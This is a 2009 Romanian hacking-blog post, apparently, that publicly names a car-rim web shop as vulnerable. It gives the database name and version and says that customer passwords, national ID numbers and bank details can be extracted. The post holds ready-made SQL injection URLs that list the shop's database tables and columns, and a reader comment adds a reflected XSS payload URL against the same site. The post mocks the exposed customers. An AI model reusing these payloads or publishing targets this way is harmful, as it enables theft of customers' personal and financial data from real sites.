Loading....
Loading....

    Posted by 2fingers in English News

    Posted on January 26th, 2009

    Vulnerabilitate raportata de daemien:

    Site URL: http://www.shop-jante.ro

    DB Name:cardesign_new

    Versiune database: 5.0.22

    ————–

    La prima vedere pare un site banal, un simplu shop de jante aliaj [ce-i drept numai marci high-end]. Pacat de numarul mare de clienti [persoane fizice cat si juridice] care nu stiu la ce riscuri se expun atunci cand se inregistreaza pe acest site, evident slab securizat!

    Se pot extrage cu usurinta informatii din baza de date precum: username, parola, email, nume, prenume, adresa, serie BI, CNP, telefon, cont, banca etc…

    Pretty fucked up.. huh?! :) ))))))))

    ————–

    Tabele:

    http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,table_name,4%20from%20information_schema.tables–

    Coloane:

    http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,column_name,4%20from%20information_schema.columns–

    Free Image Hosting at www.ImageShack.us

    Free Image Hosting at www.ImageShack.us

    Multumim daemien

    Related Posts

    2 Responses to “Sql Injection in shop-jante.ro”

    1. xZu Says:

      “Pacat de numarul mare de clienti”
      Intradevar…
      In afara subiectului: 2fingers poti uploada pozele pe http://tinypic.com … ma deranjeaza pop-up-urile de la imageshack.
      Mersi

    2. daemien Says:

      Imi cer scuze ca am uitat sa precizez in mail si vulnerabilitatea de tip XSS, asadar .. tadadadaaaaammmmm:
      http://shop-jante.ro/filterByCar.php?marcaMasina=46&anul=2003&model=%22%3E%3Cscript%3Ealert(/daemien@sysboard.net/)%3C/script%3E&diameter=8.5×20

      :-|

    Leave a Reply